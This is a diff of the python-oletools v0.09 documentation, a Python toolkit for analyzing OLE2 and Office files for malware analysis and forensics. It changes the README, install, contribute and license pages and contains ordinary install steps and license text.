+   RTF, which is especially useful for malware analysis.
+-  `rtfobj <https://bitbucket.org/decalage/oletools/wiki/rtfobj>`__: a
+   tool and python module to extract embedded objects from RTF files.
+-  and a few others (coming soon)
+
+Download and Install:
+---------------------
+
+To use python-oletools from the command line as analysis tools, you may
+simply `download the zip
+archive <https://bitbucket.org/decalage/oletools/downloads>`__ and
+extract the files in the directory of your choice.
+
+To get the latest development version, click on "Download repository" on
+the `downloads
+page <https://bitbucket.org/decalage/oletools/downloads>`__, or use
+mercurial to clone the repository.
+
+If you plan to use python-oletools with other Python applications or
+your own scripts, then the simplest solution is to use "**pip install
+oletools**\ " or "**easy\_install oletools**\ " to download and install
+in one go. Otherwise you may download/extract the zip archive and run
+"**setup.py install**\ ".
+
+Documentation:
+--------------
+
+The latest version of the documentation can be found
+`online <https://bitbucket.org/decalage/oletools/wiki>`__, otherwise a
+copy is provided in the doc subfolder of the package.
+
+How to Suggest Improvements, Report Issues or Contribute:
+---------------------------------------------------------
+
+This is a personal open-source project, developed on my spare time. Any
+contribution, suggestion, feedback or bug report is welcome.
+
+To suggest improvements, report a bug or any issue, please use the
+`issue reporting
+page <https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open>`__,
+providing all the information and files to reproduce the problem.
+
+You may also `contact the author <http://decalage.info/contact>`__
+directly to provide feedback.
+
+The code is available in `a Mercurial repository on
+Bitbucket <https://bitbucket.org/decalage/oletools>`__. You may use it
+to submit enhancements using forks and pull requests.
+
+License
+-------
+
+This license applies to the python-oletools package, apart from the
+thirdparty folder which contains third-party files published with their
+own license.
+
+The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec
+(http://www.decalage.info)
+
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are
+met:
+
+-  Redistributions of source code must retain the above copyright
+   notice, this list of conditions and the following disclaimer.
+-  Redistributions in binary form must reproduce the above copyright
+   notice, this list of conditions and the following disclaimer in the
+   documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
+IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
+TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
+PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
+TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
+PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
+LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
+NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+--------------
+
+olevba contains modified source code from the officeparser project,
+published under the following MIT License (MIT):
+
+officeparser is copyright (c) 2014 John William Davison
+
+Permission is hereby granted, free of charge, to any person obtaining a
+copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to
+permit persons to whom the Software is furnished to do so, subject to
+the following conditions:
+
+The above copyright notice and this permission notice shall be included
+in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
+OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
+CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
+TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
+SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-  <meta http-equiv="Content-Style-Type" content="text/css" />
-  <meta name="generator" content="pandoc" />
-  <title></title>
-</head>
-<body>
-<h1 id="how-to-suggest-improvements-report-issues-or-contribute">How to Suggest Improvements, Report Issues or Contribute</h1>
-<p>This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.</p>
-<p>To <strong>suggest improvements, report a bug or any issue</strong>, please use the <a href="https://bitbucket.org/decalage/oletools/issues?status=new&amp;status=open">issue reporting page</a>, providing all the information and files to reproduce the problem.</p>
-<p>You may also <a href="http://decalage.info/contact">contact the author</a> directly to <strong>provide feedback</strong>.</p>
-<p>The code is available in <a href="https://bitbucket.org/decalage/oletools">a Mercurial repository on Bitbucket</a>. You may use it to <strong>submit enhancements</strong> using forks and pull requests.</p>
-<hr />
-<h2 id="python-oletools-documentation">python-oletools documentation</h2>
-<ul>
-<li><a href="Home.html">Home</a></li>
-<li><a href="License.html">License</a></li>
-<li><a href="Install.html">Install</a></li>
-<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
-<li>Tools:
-<ul>
-<li><a href="olebrowse.html">olebrowse</a></li>
-<li><a href="oleid.html">oleid</a></li>
-<li><a href="olemeta.html">olemeta</a></li>
-<li><a href="oletimes.html">oletimes</a></li>
-<li><a href="olevba.html">olevba</a></li>
-<li><a href="pyxswf.html">pyxswf</a></li>
-<li><a href="rtfobj.html">rtfobj</a></li>
-</ul></li>
-</ul>
-</body>
-</html>
+<p>How to Suggest Improvements, Report Issues or Contribute</p>
+<p>========================================================</p>
+<p>This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.</p>
+<p>To <strong>suggest improvements, report a bug or any issue</strong>, please use the <a href="https://bitbucket.org/decalage/oletools/issues?status=new&amp;status=open">issue reporting page</a>,</p>
+<p>providing all the information and files to reproduce the problem.</p>
+<p>You may also <a href="http://decalage.info/contact">contact the author</a> directly to <strong>provide feedback</strong>.</p>
+<p>The code is available in <a href="https://bitbucket.org/decalage/oletools">a Mercurial repository on Bitbucket</a>.</p>
+<p>You may use it to <strong>submit enhancements</strong> using forks and pull requests.</p>
+<hr />
+<p>python-oletools documentation</p>
+<hr />
+<ul>
+<li><p><a href="Home.html">Home</a></p></li>
+<li><p><a href="License.html">License</a></p></li>
+<li><p><a href="Install.html">Install</a></p></li>
+<li><p><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</p></li>
+<li><p>Tools:</p>
+<ul>
+<li><p><a href="olebrowse.html">olebrowse</a></p></li>
+<li><p><a href="oleid.html">oleid</a></p></li>
+<li><p><a href="olemeta.html">olemeta</a></p></li>
+<li><p><a href="oletimes.html">oletimes</a></p></li>
+<li><p><a href="olevba.html">olevba</a></p></li>
+<li><p><a href="pyxswf.html">pyxswf</a></p></li>
+<li><p><a href="rtfobj.html">rtfobj</a></p></li>
+</ul></li>
+</ul>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-  <meta http-equiv="Content-Style-Type" content="text/css" />
-  <meta name="generator" content="pandoc" />
-  <title></title>
-</head>
-<body>
-<h1 id="python-oletools-v0.08-documentation">python-oletools v0.08 documentation</h1>
-<p>This is the home page of the documentation for python-oletools. The latest version can be found <a href="https://bitbucket.org/decalage/oletools/wiki">online</a>, otherwise a copy is provided in the doc subfolder of the package.</p>
-<p><a href="http://www.decalage.info/python/oletools">python-oletools</a> is a package of python tools to analyze <a href="http://en.wikipedia.org/wiki/Compound_File_Binary_Format">Microsoft OLE2 files</a> (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the <a href="http://www.decalage.info/olefile">olefile</a> parser. See <a href="http://www.decalage.info/python/oletools">http://www.decalage.info/python/oletools</a> for more info.</p>
-<p><strong>Quick links:</strong> <a href="http://www.decalage.info/python/oletools">Home page</a> - <a href="https://bitbucket.org/decalage/oletools/wiki/Install">Download/Install</a> - <a href="https://bitbucket.org/decalage/oletools/wiki">Documentation</a> - <a href="https://bitbucket.org/decalage/oletools/issues?status=new&amp;status=open">Report Issues/Suggestions/Questions</a> - <a href="http://decalage.info/contact">Contact the author</a> - <a href="https://bitbucket.org/decalage/oletools">Repository</a> - <a href="https://twitter.com/decalage2">Updates on Twitter</a></p>
-<p>Note: python-oletools is not related to OLETools published by BeCubed Software.</p>
-<h2 id="tools-in-python-oletools">Tools in python-oletools:</h2>
-<ul>
-<li><strong><a href="olebrowse.html">olebrowse</a></strong>: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.</li>
-<li><strong><a href="oleid.html">oleid</a></strong>: a tool to analyze OLE files to detect specific characteristics usually found in malicious files.</li>
-<li><strong><a href="olemeta.html">olemeta</a></strong>: a tool to extract all standard properties (metadata) from OLE files.</li>
-<li><strong><a href="oletimes.html">oletimes</a></strong>: a tool to extract creation and modification timestamps of all streams and storages.</li>
-<li><strong><a href="olevba.html">olevba</a></strong>: a tool to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).</li>
-<li><strong><a href="pyxswf.html">pyxswf</a></strong>: a tool to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis.</li>
-<li><strong><a href="rtfobj.html">rtfobj</a></strong>: a tool and python module to extract embedded objects from RTF files.</li>
-<li>and a few others (coming soon)</li>
-</ul>
-<hr />
-<h2 id="python-oletools-documentation">python-oletools documentation</h2>
-<ul>
-<li><a href="Home.html">Home</a></li>
-<li><a href="License.html">License</a></li>
-<li><a href="Install.html">Install</a></li>
-<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
-<li>Tools:
-<ul>
-<li><a href="olebrowse.html">olebrowse</a></li>
-<li><a href="oleid.html">oleid</a></li>
-<li><a href="olemeta.html">olemeta</a></li>
-<li><a href="oletimes.html">oletimes</a></li>
-<li><a href="olevba.html">olevba</a></li>
-<li><a href="pyxswf.html">pyxswf</a></li>
-<li><a href="rtfobj.html">rtfobj</a></li>
-</ul></li>
-</ul>
-</body>
-</html>
+<p>python-oletools v0.09 documentation</p>
+<p>===================================</p>
+<p>This is the home page of the documentation for python-oletools. The latest version can be found</p>
+<p><a href="https://bitbucket.org/decalage/oletools/wiki">online</a>, otherwise a copy is provided in the doc subfolder of the package.</p>
+<p><a href="http://www.decalage.info/python/oletools">python-oletools</a> is a package of python tools to analyze</p>
+<p><a href="http://en.wikipedia.org/wiki/Compound_File_Binary_Format">Microsoft OLE2 files</a></p>
+<p>(also called Structured Storage, Compound File Binary Format or Compound Document File Format),</p>
+<p>such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging.</p>
+<p>It is based on the <a href="http://www.decalage.info/olefile">olefile</a> parser.</p>
+<p>See <a href="http://www.decalage.info/python/oletools">http://www.decalage.info/python/oletools</a> for more info.</p>
+<p><strong>Quick links:</strong> <a href="http://www.decalage.info/python/oletools">Home page</a> -</p>
+<p><a href="https://bitbucket.org/decalage/oletools/wiki/Install">Download/Install</a> -</p>
+<p><a href="https://bitbucket.org/decalage/oletools/wiki">Documentation</a> -</p>
+<p><a href="https://bitbucket.org/decalage/oletools/issues?status=new&amp;status=open">Report Issues/Suggestions/Questions</a> -</p>
+<p><a href="http://decalage.info/contact">Contact the author</a> -</p>
+<p><a href="https://bitbucket.org/decalage/oletools">Repository</a> -</p>
+<p><a href="https://twitter.com/decalage2">Updates on Twitter</a></p>
+<p>Note: python-oletools is not related to OLETools published by BeCubed Software.</p>
+<p>Tools in python-oletools:</p>
+<hr />
+<ul>
+<li><strong><a href="olebrowse.html">olebrowse</a></strong>: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to</li>
+</ul>
+<p>view and extract individual data streams.</p>
+<ul>
+<li><p><strong><a href="oleid.html">oleid</a></strong>: a tool to analyze OLE files to detect specific characteristics usually found in malicious files.</p></li>
+<li><p><strong><a href="olemeta.html">olemeta</a></strong>: a tool to extract all standard properties (metadata) from OLE files.</p></li>
+<li><p><strong><a href="oletimes.html">oletimes</a></strong>: a tool to extract creation and modification timestamps of all streams and storages.</p></li>
+<li><p><strong><a href="olevba.html">olevba</a></strong>: a tool to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).</p></li>
+<li><p><strong><a href="pyxswf.html">pyxswf</a></strong>: a tool to detect, extract and analyze Flash objects (SWF) that may</p></li>
+</ul>
+<p>be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF,</p>
+<p>which is especially useful for malware analysis.</p>
+<ul>
+<li><p><strong><a href="rtfobj.html">rtfobj</a></strong>: a tool and python module to extract embedded objects from RTF files.</p></li>
+<li><p>and a few others (coming soon)</p></li>
+</ul>
+<hr />
+<p>python-oletools documentation</p>
+<hr />
+<ul>
+<li><p><a href="Home.html">Home</a></p></li>
+<li><p><a href="License.html">License</a></p></li>
+<li><p><a href="Install.html">Install</a></p></li>
+<li><p><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</p></li>
+<li><p>Tools:</p>
+<ul>
+<li><p><a href="olebrowse.html">olebrowse</a></p></li>
+<li><p><a href="oleid.html">oleid</a></p></li>
+<li><p><a href="olemeta.html">olemeta</a></p></li>
+<li><p><a href="oletimes.html">oletimes</a></p></li>
+<li><p><a href="olevba.html">olevba</a></p></li>
+<li><p><a href="pyxswf.html">pyxswf</a></p></li>
+<li><p><a href="rtfobj.html">rtfobj</a></p></li>
+</ul></li>
+</ul>
-python-oletools v0.08 documentation
+python-oletools v0.09 documentation
 ===================================
  
 This is the home page of the documentation for python-oletools. The latest version can be found 
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-  <meta http-equiv="Content-Style-Type" content="text/css" />
-  <meta name="generator" content="pandoc" />
-  <title></title>
-</head>
-<body>
-<h1 id="how-to-download-and-install-python-oletools">How to Download and Install python-oletools</h1>
-<h2 id="pre-requisites">Pre-requisites</h2>
-<p>For now, python-oletools require Python 2.x, if possible 2.6 or 2.7. They are not compatible with Python 3.x yet.</p>
-<h2 id="to-use-oletools-as-command-line-tools">To use oletools as command-line tools</h2>
-<p>To use python-oletools from the command line as analysis tools, you may simply <a href="https://bitbucket.org/decalage/oletools/downloads">download the zip archive</a> and extract the files in the directory of your choice. Pick the latest release version, or click on &quot;Download Repository&quot; to get the latest development version with the most recent features.</p>
-<p>Another possibility is to use a Mercurial client (hg) to clone the repository in a folder. You can then update it easily in the future.</p>
-<p>You may add the oletools directory to your PATH environment variable to access the tools from anywhere.</p>
-<h2 id="for-python-applications">For python applications</h2>
-<p>If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use <strong>&quot;pip install oletools&quot;</strong> or <strong>&quot;easy_install oletools&quot;</strong> to download and install the package in one go. Pip is included with Python since version 2.7.9.</p>
-<p><strong>Important: to update oletools</strong> if it is already installed, you must run <strong>&quot;pip install -U oletools&quot;</strong>, otherwise pip will not update it.</p>
-<p>Alternatively, you may download/extract the <a href="https://bitbucket.org/decalage/oletools/downloads">zip archive</a> in a temporary directory and run <strong>&quot;python setup.py install&quot;</strong>.</p>
-<hr />
-<h2 id="python-oletools-documentation">python-oletools documentation</h2>
-<ul>
-<li><a href="Home.html">Home</a></li>
-<li><a href="License.html">License</a></li>
-<li><a href="Install.html">Install</a></li>
-<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
-<li>Tools:
-<ul>
-<li><a href="olebrowse.html">olebrowse</a></li>
-<li><a href="oleid.html">oleid</a></li>
-<li><a href="olemeta.html">olemeta</a></li>
-<li><a href="oletimes.html">oletimes</a></li>
-<li><a href="olevba.html">olevba</a></li>
-<li><a href="pyxswf.html">pyxswf</a></li>
-<li><a href="rtfobj.html">rtfobj</a></li>
-</ul></li>
-</ul>
-</body>
-</html>
+<p>How to Download and Install python-oletools</p>
+<p>===========================================</p>
+<p>Pre-requisites</p>
+<hr />
+<p>For now, python-oletools require <strong>Python 2.x</strong>, if possible 2.7 or 2.6 to enable all features.</p>
+<p>They are not compatible with Python 3.x yet. (Please contact me if that is a strong requirement)</p>
+<p>To use oletools as command-line tools</p>
+<hr />
+<p>To use python-oletools from the command line as analysis tools, you may simply</p>
+<p><a href="https://bitbucket.org/decalage/oletools/downloads">download the zip archive</a></p>
+<p>and extract the files into the directory of your choice. Pick the latest release version, or click on</p>
+<p><strong>&quot;Download Repository&quot;</strong> to get the latest development version with the most recent features.</p>
+<p>Another possibility is to use a Mercurial client (hg) to clone the repository into a folder. You can then update it easily</p>
+<p>in the future.</p>
+<h3 id="windows">Windows</h3>
+<p>You may add the oletools directory to your PATH environment variable to access the tools from anywhere.</p>
+<h3 id="linux-mac-osx-unix">Linux, Mac OSX, Unix</h3>
+<p>It is very convenient to create symbolic links to each tool in one of the bin directories in order to run them as shell</p>
+<p>commands from anywhere. For example, here is how to create an executable link &quot;olevba&quot; in /usr/local/bin pointing to</p>
+<p>olevba.py, assuming oletools was unzipped into /opt/oletools:</p>
+<pre><code>chmod +x /opt/oletools/oletools/olevba.py
+
+ln -s /opt/oletools/oletools/olevba.py /usr/local/bin/olevba</code></pre>
+<p>Then the olevba command can be used from any directory:</p>
+<pre><code>user@remnux:~/MalwareZoo/VBA$ olevba dridex427.xls |less</code></pre>
+<p>For python applications</p>
+<hr />
+<p>If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use</p>
+<p><strong>&quot;pip install oletools&quot;</strong> or <strong>&quot;easy_install oletools&quot;</strong> to download and install the package in one go. Pip is included</p>
+<p>with Python since version 2.7.9.</p>
+<p><strong>Important: to update oletools</strong> if it is already installed, you must run <strong>&quot;pip install -U oletools&quot;</strong>, otherwise pip</p>
+<p>will not update it.</p>
+<p>Alternatively if you prefer the old school way, you may download the</p>
+<p><a href="https://bitbucket.org/decalage/oletools/downloads">zip archive</a>, extract it into</p>
+<p>a temporary directory and run <strong>&quot;python setup.py install&quot;</strong>.</p>
+<hr />
+<p>python-oletools documentation</p>
+<hr />
+<ul>
+<li><p><a href="Home.html">Home</a></p></li>
+<li><p><a href="License.html">License</a></p></li>
+<li><p><a href="Install.html">Install</a></p></li>
+<li><p><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</p></li>
+<li><p>Tools:</p>
+<ul>
+<li><p><a href="olebrowse.html">olebrowse</a></p></li>
+<li><p><a href="oleid.html">oleid</a></p></li>
+<li><p><a href="olemeta.html">olemeta</a></p></li>
+<li><p><a href="oletimes.html">oletimes</a></p></li>
+<li><p><a href="olevba.html">olevba</a></p></li>
+<li><p><a href="pyxswf.html">pyxswf</a></p></li>
+<li><p><a href="rtfobj.html">rtfobj</a></p></li>
+</ul></li>
+</ul>
-How to Download and Install python-oletools
-===========================================
-
-Pre-requisites
---------------
-
-For now, python-oletools require Python 2.x, if possible 2.6 or 2.7. They are not compatible with Python 3.x yet.
-
-
-To use oletools as command-line tools
--------------------------------------
-
-To use python-oletools from the command line as analysis tools, you may simply 
-[download the zip archive](https://bitbucket.org/decalage/oletools/downloads) 
-and extract the files in the directory of your choice. Pick the latest release version, or click on "Download Repository"
-to get the latest development version with the most recent features.
-
-Another possibility is to use a Mercurial client (hg) to clone the repository in a folder. You can then update it easily
-in the future.
-
-You may add the oletools directory to your PATH environment variable to access the tools from anywhere.
-
-
-For python applications
------------------------
-
-If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use 
-**"pip install oletools"** or **"easy_install oletools"** to download and install the package in one go. Pip is included
-with Python since version 2.7.9.
-
-**Important: to update oletools** if it is already installed, you must run **"pip install -U oletools"**, otherwise pip
-will not update it.
-
-Alternatively, you may download/extract the [zip archive](https://bitbucket.org/decalage/oletools/downloads) in a temporary 
-directory and run **"python setup.py install"**.
-
---------------------------------------------------------------------------
-
-python-oletools documentation
------------------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- Tools:
-	- [[olebrowse]]
-	- [[oleid]]
-	- [[olemeta]]
-	- [[oletimes]]
-	- [[olevba]]
-	- [[pyxswf]]
+How to Download and Install python-oletools
+===========================================
+
+Pre-requisites
+--------------
+
+For now, python-oletools require **Python 2.x**, if possible 2.7 or 2.6 to enable all features. 
+
+They are not compatible with Python 3.x yet. (Please contact me if that is a strong requirement)
+
+
+To use oletools as command-line tools
+-------------------------------------
+
+To use python-oletools from the command line as analysis tools, you may simply 
+[download the zip archive](https://bitbucket.org/decalage/oletools/downloads) 
+and extract the files into the directory of your choice. Pick the latest release version, or click on 
+**"Download Repository"** to get the latest development version with the most recent features.
+
+Another possibility is to use a Mercurial client (hg) to clone the repository into a folder. You can then update it easily
+in the future.
+
+### Windows
+
+You may add the oletools directory to your PATH environment variable to access the tools from anywhere.
+
+### Linux, Mac OSX, Unix
+
+It is very convenient to create symbolic links to each tool in one of the bin directories in order to run them as shell 
+commands from anywhere. For example, here is how to create an executable link "olevba" in /usr/local/bin pointing to 
+olevba.py, assuming oletools was unzipped into /opt/oletools:
+
+    :::text
+    chmod +x /opt/oletools/oletools/olevba.py
+    ln -s /opt/oletools/oletools/olevba.py /usr/local/bin/olevba
+    
+Then the olevba command can be used from any directory:
+
+    :::text
+    user@remnux:~/MalwareZoo/VBA$ olevba dridex427.xls |less
+
+
+For python applications
+-----------------------
+
+If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use 
+**"pip install oletools"** or **"easy_install oletools"** to download and install the package in one go. Pip is included
+with Python since version 2.7.9.
+
+**Important: to update oletools** if it is already installed, you must run **"pip install -U oletools"**, otherwise pip
+will not update it.
+
+Alternatively if you prefer the old school way, you may download the 
+[zip archive](https://bitbucket.org/decalage/oletools/downloads), extract it into 
+a temporary directory and run **"python setup.py install"**.
+
+--------------------------------------------------------------------------
+
+python-oletools documentation
+-----------------------------
+
+- [[Home]]
+- [[License]]
+- [[Install]]
+- [[Contribute]], Suggest Improvements or Report Issues
+- Tools:
+	- [[olebrowse]]
+	- [[oleid]]
+	- [[olemeta]]
+	- [[oletimes]]
+	- [[olevba]]
+	- [[pyxswf]]
 	- [[rtfobj]] 
 \ No newline at end of file
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-  <meta http-equiv="Content-Style-Type" content="text/css" />
-  <meta name="generator" content="pandoc" />
-  <title></title>
-</head>
-<body>
-<h1 id="license-for-python-oletools">License for python-oletools</h1>
-<p>This license applies to the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package, apart from the thirdparty folder which contains third-party files published with their own license.</p>
-<p>The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec (<a href="http://www.decalage.info">http://www.decalage.info</a>)</p>
-<p>All rights reserved.</p>
-<p>Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:</p>
-<ul>
-<li>Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.</li>
-<li>Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.</li>
-</ul>
-<p>THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS &quot;AS IS&quot; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.</p>
-<table>
-<tbody>
-<tr class="odd">
-<td align="left">License for officeparser</td>
-</tr>
-</tbody>
-</table>
-<p>olevba contains modified source code from the <a href="https://github.com/unixfreak0037/officeparser">officeparser</a> project, published under the following MIT License (MIT):</p>
-<p>officeparser is copyright (c) 2014 John William Davison</p>
-<p>Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the &quot;Software&quot;), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:</p>
-<p>The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.</p>
-<p>THE SOFTWARE IS PROVIDED &quot;AS IS&quot;, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.</p>
-<hr />
-<h2 id="python-oletools-documentation">python-oletools documentation</h2>
-<ul>
-<li><a href="Home.html">Home</a></li>
-<li><a href="License.html">License</a></li>
-<li><a href="Install.html">Install</a></li>
-<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
-<li>Tools:
-<ul>
-<li><a href="olebrowse.html">olebrowse</a></li>
-<li><a href="oleid.html">oleid</a></li>
-<li><a href="olemeta.html">olemeta</a></li>
-<li><a href="oletimes.html">oletimes</a></li>
-<li><a href="olevba.html">olevba</a></li>
-<li><a href="pyxswf.html">pyxswf</a></li>
-<li><a href="rtfobj.html">rtfobj</a></li>
-</ul></li>
-</ul>
-</body>
-</html>
+<p>License for python-oletools</p>
+<p>===========================</p>
+<p>This license applies to the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package, apart from the</p>
+<p>thirdparty folder which contains third-party files published with their own license.</p>
+<p>The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec (<a href="http://www.decalage.info">http://www.decalage.info</a>)</p>
+<p>All rights reserved.</p>
+<p>Redistribution and use in source and binary forms, with or without modification,</p>
+<p>are permitted provided that the following conditions are met:</p>
+<ul>
+<li>Redistributions of source code must retain the above copyright notice, this</li>
+</ul>
+<p>list of conditions and the following disclaimer.</p>
+<ul>
+<li>Redistributions in binary form must reproduce the above copyright notice,</li>
+</ul>
+<p>this list of conditions and the following disclaimer in the documentation</p>
+<p>and/or other materials provided with the distribution.</p>
+<p>THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS &quot;AS IS&quot; AND</p>
+<p>ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED</p>
+<p>WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE</p>
+<p>DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE</p>
+<p>FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL</p>
+<p>DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR</p>
+<p>SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER</p>
+<p>CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,</p>
+<p>OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE</p>
+<p>OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.</p>
+<hr />
+<p>License for officeparser</p>
+<hr />
+<p>olevba contains modified source code from the <a href="https://github.com/unixfreak0037/officeparser">officeparser</a> project, published</p>
+<p>under the following MIT License (MIT):</p>
+<p>officeparser is copyright (c) 2014 John William Davison</p>
+<p>Permission is hereby granted, free of charge, to any person obtaining a copy</p>
+<p>of this software and associated documentation files (the &quot;Software&quot;), to deal</p>
+<p>in the Software without restriction, including without limitation the rights</p>
+<p>to use, copy, modify, merge, publish, distribute, sublicense, and/or sell</p>
